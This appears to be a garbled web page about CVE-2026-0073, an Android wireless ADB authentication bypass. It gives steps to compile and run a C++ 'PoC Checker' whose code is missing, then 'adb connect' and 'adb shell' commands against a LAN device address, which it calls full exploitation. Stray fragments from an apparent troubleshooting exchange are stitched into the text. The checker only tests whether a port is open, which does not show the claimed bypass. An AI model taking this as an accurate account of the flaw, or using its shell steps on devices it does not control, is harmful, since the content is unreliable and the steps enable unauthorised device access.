
CVE-2026-0073
CVE-2026-0073 is a critical authentication bypass vulnerability in Android’s Wireless ADB (adbd daemon).
An attacker on the same network can bypass the mutual TLS authentication and connect to the device without user approval or previous pairing.
| Item | Details |
|---|---|
| CVE ID | CVE-2026-0073 |
| Severity | Critical |
| CVSS Score | 8.8 |
| Affected Component | adbd (Android Debug Bridge) - TLS Handler |
| Type | Authentication Bypass |
| Impact | Remote Shell Access (shell user) |
| Patched | May 2026 Android Security Bulletin |
Fixed in: Security patch level 2026-05-01 and later.
shell useradbd_tls_verify_cert()The error occurs because the file CVE-2026-0073-Checker.cpp does not exist yet.
nano CVE-2026-0073-Checker.cpp
Copy and paste the full code below into the editor:
Save and exit (Ctrl + X → Y → Enter)
Compile again:
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
./CVE-2026-0073 192.168.1.105
Here’s exactly what you will see if the C++ program works successfully on a vulnerable Android device:
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0073 PoC Checker ║
║ Android Wireless ADB Authentication Bypass ║
╚══════════════════════════════════════════════════════════════╝
Target : 192.168.1.105
[*] Checking 192.168.1.105:5555 → OPEN
[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073
Next Steps:
1. adb connect 192.168.1.105:5555
2. adb shell
OPEN in green → The ADB port is listening.Run these commands:
adb connect 192.168.1.105:5555
If it says:
connected to 192.168.1.105:5555
Then type:
adb shell
You should get inside the device:
pixel8:/ $
That is full successful exploitation.
This PoC is for educational and authorized testing only.
You may only use this tool on devices you own or have explicit permission to test. Unauthorized use is illegal and strictly prohibited.
Use at your own risk. The author is not responsible for any damage or legal consequences.
🎯 Made with caution — Use only on authorized devices.